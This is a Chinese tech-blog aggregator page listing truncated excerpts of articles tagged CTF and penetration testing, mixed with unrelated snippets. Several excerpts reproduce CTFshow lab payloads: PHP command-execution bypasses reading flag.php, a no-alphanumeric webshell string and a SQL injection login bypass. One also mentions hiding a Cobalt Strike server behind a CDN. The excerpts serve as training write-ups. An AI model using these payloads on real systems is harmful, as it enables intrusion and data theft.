E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
CTF渗透
Android 车载应用开发之车载操作系统
一、前言到2030年,全球电动汽车的销量将超过7000万辆,保有量将达到3.8亿辆,全球年度新车
渗透
率有望触及60%。这一数据来自国际能源署(IEA)发布的《全球电动汽车展望2023》。
xiangzhihong8
·
2024-02-09 07:32
深入Android应用开发
Android
CTF
show web(php命令执行 45-49)
基础知识:1.绕过cat使用:tacmorelessheadtactailnlod(二进制查看)vivimsortuniqrev2.绕过空格用:%09/dev/null2>&1");}}else{highlight_file(__FILE__);}这里system($c.">/dev/null2>&1");就是把内容写入黑洞的意思。||是可以进行命令分割的,意思是只会执行前面的命令,所以直接?c=
补天阁
·
2024-02-09 07:37
前端
php
java
CTFshow
web安全
CTF
show web(命令执行 41-44)
web41额,这里直接就给禁止所有字母和数字,其实看到这种全过滤,反倒是只有一种解法,就是构造字符串&按位与|按位或^按位异或~取反为四大位运算符,其中按位异|没有过滤,过滤的字符是防异或、自增和取反构造字符根据羽师傅的脚本:=32&ord($c)/dev/null2>&1");}else{highlight_file(__FILE__);}典型的双写绕过,因为system($c.">/dev/n
补天阁
·
2024-02-09 07:35
前端
android
CTFshow
web安全
odoo自定义widget组件两种方式
constcore=require('web.core');constQWeb=core.qweb;const{useState,useRef}=owl.hooks;//方式1函数方式constAbstra
ctF
宁致乐水
·
2024-02-09 07:55
javascript
odoo
python
【观察】华为:打造多样性算力,开创计算新时代
毫无疑问,如今的世界正在以加速度进入到智能化时代,特别是各项业务的云化深入以及万物互联,数据处理能力的进一步提升,智能算法一次又一次的突破,以及未来5G在行业中更加密集的
渗透
,逐渐形成了“物理世界数字化
申耀的科技观察
·
2024-02-09 06:18
[BUU
CTF
][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
目录题目链接:题目解析:得到flag:题目链接:https://buuoj.cn/challenges#[%E7%AC%AC%E4%B8%80%E7%AB%A0%20web%E5%85%A5%E9%97%A8]SQL%E6%B3%A8%E5%85%A5-2题目解析:注意查看细节,发现题目中有一处请访问,在上图标记的位置我们按提示分别访问/login.php和/user.php去看看进入页面后习惯性
柠.筱
·
2024-02-09 06:16
BUUCTF-WEB-WP
php
web安全
开发语言
sql
演讲学习打卡4/100 解构Simon Sinek的演讲(上)
redire
ctF
rom=h5(大部分学习视频都是在Youtube上扒的,因为外国视频Youtube更全,但如果有小伙伴感兴趣的话,这个视频刚好在Bilibili可以看到)SimonSinek在OliverScholars
Kate_LU
·
2024-02-09 06:30
CTF
练习1
BUGKU题目ezbypass参考自己之前写的博客:RCE挑战(自增的学习)·语雀挺典型的一道无字母数字webshell的题目,可以值得再研究下测试后还有这些字符可以用post方式传入payload:code=$_=(_/_._)[_];$_++;$__=$_.$_++;$_++;$_++;$_++;$__=$__.$_;$_++;$__=$__.$_;$_=_.$__;$$_[_]($$_[__
0e1G7
·
2024-02-09 06:30
经验分享
安全
web安全
CTF
--Web安全--SQL注入之Post-Union注入
一、手动POST注入实现绕过账号密码检测我们利用sqli-labs/Less-11靶场来进行演示:我们可以看到一个登录页面打开Less-11的根目录,我们打开页面的源代码(PHP实现)。用VS-code打开文件,找到验证登录信息的代码行。此形式的代码存在POST注入漏洞。我们可以注入一句万能密码。admin'or1=1#单看这句代码可能不是很直观,我们将这句万能密码写到源代码中进行观察。@$sql
给我杯冰美式
·
2024-02-09 05:23
Web安全--SQL注入
web安全
sql
安全
CTF
--Web安全--SQL注入之报错注入
一、报错注入的概念用户使用数据库查询语句,向数据库发送错误指令,数据库返回报错信息,报错信息中参杂着我们想要获取的隐私数据。通常在我们在页面显示中找不到回显位的时候,使用报错注入。二、报错注入常见的三种形式1、extractvalue报错注入2、updatexml报错注入3、floor报错注入除以上三种,还有大量的报错注入形式,以上三种最为常见,其中floor报错注入较复杂。三、extractva
给我杯冰美式
·
2024-02-09 05:53
Web安全--SQL注入
web安全
sql
数据库
CTF
-Web安全--SQL注入之Union注入详解
一、测试靶场与使用工具浏览器:火狐浏览器--Firefox靶场:sqli-labs使用插件:HackBar操作环境:phpstudy二、判断字符型注入与数字型注入操作步骤:1、用F12打开控制台,打开HackBar,LoarURL,将当前靶场的URL信息复制到操作台上2、输入?id=1,观察到页面发生变化,显示的是id=1时数据库中的信息,?是用来分割URL和查询字符串的,查询到了id=1时的用户
给我杯冰美式
·
2024-02-09 05:52
Web安全--SQL注入
web安全
sql
安全
CTF
--Web安全--SQL注入之‘绕过方法’
一、什么是绕过注入众所周知,SQL注入是利用源码中的漏洞进行注入的,但是有攻击手段,就会有防御手段。很多题目和网站会在源码中设置反SQL注入的机制。SQL注入中常用的命令,符号,甚至空格,会在反SQL机制中被实体化,从而失效,这时就要用到绕过的方法继续进行SQL注入。二、过滤注释符绕过1、反注入形式:SQL注入语句中,常见的注释符有三种:分别写作?id=1'--+/?id=1'#/?id=1'%2
给我杯冰美式
·
2024-02-09 05:50
Web安全--SQL注入
web安全
sql
数据库
渗透
测试利器【Cobalt Strike】CDN隐匿
CobaltStrike概述CobaltStrike是一款漂亮国RedTeam开发的
渗透
测试神器,常被业界人称为CS。成为了
渗透
测试中不可缺少的利器。
H_00c8
·
2024-02-09 05:42
红队学习笔记--->Day1
其实学web
渗透
的小编,一直都有一个当红队人员的心❤️❤️虽然后面会学,但是小编还是购买了一些对应的书籍以及上网找了一些对应的资料于是今天就来梳理一下我素未谋面的万里恩师的红队公开课,虽然是基础版本,但是对小白构建红队的知识体系还是非常友好的
[email protected]
·
2024-02-09 04:50
学习
笔记
《土地的誓言》
讲了9.18,讲了七七事变,讲了国破家亡,唇亡齿寒,爱国教育
渗透
其中。之后谈文章的语言,让他们自己找喜欢的句子,并说明喜欢的理由。很踊跃,但水平参差不齐。随之谈到习作中的语言。不得不承
行走的阳光
·
2024-02-09 02:52
徐忠顺 刘友龙秦皇岛焦点解决坚持分享第44天2019.11.189
它们就像是细胞膜一样,通过选择性
渗透
作用让滋养细胞的水分和营养物通过,将各种毒素挡在外面。你也可以通过调节你的界线的
渗透
性来决定哪些事物、需求可以接受,哪些要被排除在外。界线不应该设定得太过僵硬。
雨顺心理
·
2024-02-09 02:07
Kine
ctF
usion论文品读
Kine
ctF
usion:Real-timedensesurfacemappingandtracking论文链接:https://ieeexplore.ieee.org/document/6162880
自信侠
·
2024-02-09 00:18
《镜双城》:剧中五对情侣,只有一对收获了幸福
鲛人不善战,所以他们打得是“
渗透
战”,深入空桑和苍流人之间,利用他们达成自己的目的。但鲛人有着“生化”和“未生化”之分,他们为了爱的人选择变成男还是女。更可怜的是,鲛人一生只能爱一个人。
windy天意晚晴
·
2024-02-09 00:35
Unity UGUI事件穿透
其实Unity交互其实都是基于射线检测的,当我们检测到当前面板的时候,我们只需要将当前的事件
渗透
下去就行了
Unity大海
·
2024-02-08 23:06
Unity
[红日靶机
渗透
] ATK&CK红队评估实战靶场三
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【
渗透
领域】【应急响应】【ATK&CK红队评估实战靶场】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏=
hacker-routing
·
2024-02-08 23:26
红日靶场
【精选】VulnHub
渗透测试靶场练习平台
web
linux
前端
vulnhub
CTF
网络安全
红日靶场
渗透测试
【精选】java初识多态 子类继承父类
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【
渗透
领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连
hacker-routing
·
2024-02-08 23:56
小白学JAVA
web
java
开发语言
网络
网络安全
服务器
渗透
安全及
渗透
测试流程
网络安全的定义什么是网络安全?1、国际化标准组织(ISO)引用ISO-74982文献中对安全的定义:安全就是最大程度地减少数据和资源被攻击的可能性。2、《计算机信息安全系统保护条例》中的第三条规范了包括计算机网络系统在内的计算机信息系统安全的概述:“计算机信息系统的安全保护,应当保障计算机及其相关的配套的设备、设施(含网络)的安全,运行环境的安全,保障信息的安全,保障计算机功能的正常发挥,以维护计
香芋320
·
2024-02-08 23:56
计算机
网络
安全
信息安全
【BUU
CTF
N1BOOK】[第二章 web进阶] 通关
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【
渗透
领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连
hacker-routing
·
2024-02-08 23:55
web
CTF夺旗赛
前端
javascript
开发语言
BUUCTF
CTF
网络安全
什么是网络
渗透
,应当如何防护?
什么是网络
渗透
网络
渗透
是攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时网络
渗透
也是安全工作者所研究的一个课题,在他们口中通常被称为"
渗透
测试(PenetrationTest)"。
德迅云安全小李
·
2024-02-08 23:25
网络
php
安全
[VulnHub靶机
渗透
] dpwwn: 1
博主介绍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【
渗透
领域】【应急响应】【python】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连
hacker-routing
·
2024-02-08 23:55
web
【精选】VulnHub
渗透测试靶场练习平台
linux
前端
vulnhub
CTF
网络安全
提权
漏洞
web
渗透
入门
目录工具...2攻击类型...2SQL注入...2Exploit网站及工具...3预防SQL注入...13攻击类型...15跨站点请求伪造...19缓存投毒...20代码注入...21注释注入...23Xpath注入...25XSS.27目录遍历...29爆路径...31跨用户攻击...32会话固定攻击...33PHP对象攻击...34HTTP请求走私...36HTTP响应拆分...38工具Met
baidu_36461925
·
2024-02-08 22:12
应用层安全
sql注入
xpath
[NISA
CTF
2022]easyssrf
它提示我们输入那我们输入file:///flagfile://访问本地文件系统它提醒我们输file:///fl4g它提醒我们输ha1x1ux1u.php看到代码stristr($file,“file”)当我们输入file它会提示我们输了啥意思可以前面加个/也可以通过read读取思路都是前面加/不等于flag绕过file=php://filter/read=convert.base64-encode
Ryongao
·
2024-02-08 21:28
NSSCTF
网络安全
ctf
NSSCTF
【微信小程序】图片自适应屏幕
mode的合法值值说明最低版本scaleToFill缩放模式,不保持纵横比缩放图片,使图片的宽高完全拉伸至填满image元素aspe
ctF
it缩放模式,保持纵横
会写代码的饭桶
·
2024-02-08 20:38
微信小程序
学习日志
实践
微信小程序
模板
前端
微信小程序
图片处理
2019-03-28
不知不觉已经随着血液蔓延,透过细小的细胞
渗透
到肌理,融化在皮肤里。就连流出的泪水也被这种挥之不去,具有超强吸收力的毒素重新透过皮肤吸进骨头融进骨髓变成毒液!放眼世界,开心点。
梅花香魔
·
2024-02-08 20:35
良知与健康
现如今,金钱至上的价值观已经
渗透
到了每个角落,而在医院尤其变本加厉,无需责怪本来是天使的医生,深处在目前金钱崇拜的价值体系中,估计任何一个人都想有尊严的活着,即使是以践踏别人的尊严为代价,即使良知昏昏如睡
新儒哲
·
2024-02-08 19:21
逗比学
CTF
.day5
BUUBURPCOURSE1比较基础的IP伪造题目,基础题get到新的知识点,通过伪造X-Real-IP字段实现本地访问一、原题无源码打开后,只提示需要本地访问。二、伪造xff一说到伪造IP地址,实现本地访问,第一想到的就是X-Forwarded-For字段但是仍然提示“只能本地访问”,服务器检测的不是xff这个字段。然后只能去问度娘X-Real-IP字段映入眼帘三、伪造X-Real-IP字段这次
名为逗比
·
2024-02-08 18:43
逗比学CTF
信息安全
175_combine-two-tables
sele
ctF
irstName,LastName,City,StatefromPersonleftouterjoinAddressonPerson.PersonId=Address.PersonId;
Twopothead
·
2024-02-08 18:45
Vue3创建项目方式及步骤
creating-a-vue-application2、使用的语句有:npminstall-g@vue/cli======之前已安装vue--version======确保版本在4.5.0以上vuecreate项目的名称选择Manuasele
ctf
eatures
一起来学计算机
·
2024-02-08 17:42
vue3.js
vue.js
javascript
前端框架
十大
渗透
测试工具:为安全保驾护航
渗透
测试的时代无疑已经发生了变化。多年前,当这一攻击性安全专业开始兴起时,人们开始从手动技术向依赖各种工具转变,其中大多数工具是开源的。
知白守黑V
·
2024-02-08 17:06
渗透测试
安全漏洞
安全运营
渗透测试
安全性测试
web安全
系统安全
云安全
数据安全
Metasploit
抓住孩子学习的关键期
要抓住孩子学习的关键期,该学习规则学习规则,该学习,习惯学习,习惯该认识认识,要在生活中
渗透
一些教育,让孩子你叫正常的教育之路。而不能现在家长什么意思都没有,等到孩子所有的习惯和规则都不认识,到那时候
南风鱼儿
·
2024-02-08 17:39
做麦吉丽代理为什么要交保证金才能做
麦吉丽的每一款产品都是爱与美的神秘力量的恩赐,具有全息
渗透
的高吸收性,尤
麦吉丽小芹
·
2024-02-08 17:09
CTF
show web(命令执行29-36)
?c=eval($_GET[shy]);­=passthru('catflag.php');#逃逸过滤?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php#文件包含?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=conver
补天阁
·
2024-02-08 15:48
前端
CTFshow
web安全
CTF
show web(php命令执行 37-40)
?c=eval($_GET[shy]);­=passthru('catflag.php');#逃逸过滤?c=include%09$_GET[shy]?>­=php://filter/read=convert.base64-encode/resource=flag.php#文件包含?c=include%0a$_GET[cmd]?>&cmd=php://filter/read=conver
补天阁
·
2024-02-08 15:17
前端
php
android
CTFshow
web安全
2020-06-20辰龙:社群
渗透
式成交揭秘——颠覆你认知的万能成交体系设计
这几天呢,经常有我的徒弟和同事问我:产品内容搞好了,流量也来了,但是我就是成交不了,什么原因呢?其实我想告诉大家的是,很多人呀总是把问题搞得复杂化,复杂到最后把问题的核心是什么都忘了说为什么成交难呢,其实核心只有一个,那就是因为市场在变,但是你的方法没有变,就是你努力的方向已经错了。接下来呢,给大家举个例子有两个人呢,同样是去北京,那么一个人呢,骑的是自行车,一个人是开的法拉利,那么你说哪个人去北
辰龙社群运营专家
·
2024-02-08 15:00
DC-6靶机
渗透
测试详细教程
DC-6DC-6下载:https://download.vulnhub.com/dc/DC-6.zip.torrent攻击者kali:192.168.1.11受害者DC-6:192.168.1.10通过arp-scan-l扫描到DC-6的IP地址,如果不确定的可以在虚拟机的网络设置查看DC-6的物理地址使用namp扫描DC-6nmap-sS-A-p-192.168.1.10只有22和80端口访问一
啊醒
·
2024-02-08 15:13
VulnHub靶场通关教程
渗透测试
DC-6靶机
kali
linux
网络安全
DC-5靶机
渗透
详细步骤
1、扫描局域网存活IP因为是在我们本机,所以我们可以知道靶机的mac地址,根据mac地址来寻找ip实战的时候需要我们仔细的观察2、进行端口扫描nmap-p--sV-O192.168.0.149-p-对所有端口进行扫描-sV把每个端口的详细信息扫出来-O扫描操作系统3、查看网站信息和访问80端口因为我们扫描出来该靶机开启了80端口,所以我们可以进行访问并且查看该网站的信息我们可以知道使用的nginx
sxmmmmmmm
·
2024-02-08 15:13
DC靶机
服务器
网络
运维
系统安全
web安全
DC-8靶机
渗透
详细流程
信息收集:1.存活扫描:arp-scan-Ieth0-l└─#arp-scan-Ieth0-lInterface:eth0,type:EN10MB,MAC:00:0c:29:dd:ee:6a,IPv4:192.168.10.129Startingarp-scan1.10.0with256hosts(https://github.com/royhills/arp-scan)192.168.10.10
kitha.
·
2024-02-08 15:13
DC靶机系列渗透测试
web安全
网络安全
web
网络
安全
DC-5靶机详细
渗透
流程
信息收集:1.存活扫描:由于靶机和kali都是nat的网卡,都在一个网段,我们用arp-scan会快一点:arp-scan-Ieth0-l靶机ip:172.16.1.131└─#arp-scan-Ieth0-lInterface:eth0,type:EN10MB,MAC:00:0c:29:dd:ee:6a,IPv4:172.16.1.128Startingarp-scan1.10.0with256
kitha.
·
2024-02-08 15:12
DC靶机系列渗透测试
网络
web安全
web
安全
网络安全
DC-6靶机
渗透
详细流程
信息收集:1.存活扫描:由于靶机和kali都是nat的网卡,都在一个网段,我们用arp-scan会快一点:arp-scanarp-scan-Ieth0-l└─#arp-scan-Ieth0-lInterface:eth0,type:EN10MB,MAC:00:0c:29:dd:ee:6a,IPv4:192.168.10.129Startingarp-scan1.10.0with256hosts(h
kitha.
·
2024-02-08 15:12
DC靶机系列渗透测试
网络安全
web安全
web
网络
安全
Kioptrix 5
渗透
流程
信息收集kali和靶机都是nat的网卡1.存活扫描nmap-sn192.168.126.1/24└─#nmap-sn192.168.126.1/24StartingNmap7.94SVN(https://nmap.org)at2024-01-0121:34ESTNmapscanreportfor192.168.126.1Hostisup(0.00059slatency).MACAddress:00
kitha.
·
2024-02-08 15:42
kioptrix系列靶机渗透
网络
web安全
web
安全
网络安全
DC-7靶机
渗透
详细流程
信息收集:1.存活扫描:由于靶机和kali都是nat的网卡,都在一个网段,我们用arp-scan会快一点:arp-scanarp-scan-Ieth0-l└─#arp-scan-Ieth0-lInterface:eth0,type:EN10MB,MAC:00:0c:29:dd:ee:6a,IPv4:192.168.10.129Startingarp-scan1.10.0with256hosts(h
kitha.
·
2024-02-08 14:10
DC靶机系列渗透测试
web安全
网络安全
web
网络
安全
《安家》四位母亲,四种结局。“两极分化”的教育方式折射出多少家庭的缩影?
虽然是以中介为视角,以买房子为主轴,但在卖出的每一间房子背后,
渗透
着婚姻、职场、亲子等问题,剧中几位母亲的教育方法,使得观众在追剧的同时也引发了共情。
高见智慧
·
2024-02-08 14:45
绕过安全狗
渗透
环境选用DVWA漏洞集成环境,下载地址为http://www.dvwa.co.uk/。DVWA是一款集成的
渗透
测试演练环境,当刚刚入门并且找不到合适的靶机时,可以使用DVWA,它的搭建非常简便。
Lyx-0607
·
2024-02-08 13:57
笔记
《谁拿走了孩子的幸福》读后感
近期读了李跃儿老师的《谁拿走了孩子的幸福》一书,发现文中所举事例中的人物大部分是六七岁儿童,书中字字句句
渗透
着李跃儿老师先进的教育理念,体现着李跃儿老师渊博的知识,聪颖的智慧,散发着李跃儿老师母性的温柔和细腻
宋培利
·
2024-02-08 13:40
记一次VulnStack
渗透
信息收集netdiscover的主机发现部分不再详解,通过访问端口得知20001-2003端口都为web端口,所以优先考虑从此方向下手外网
渗透
GetShellStruct漏洞访问2001端口后,插件Wappalyzer
网安Dokii
·
2024-02-08 13:37
网络安全
上一页
7
8
9
10
11
12
13
14
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他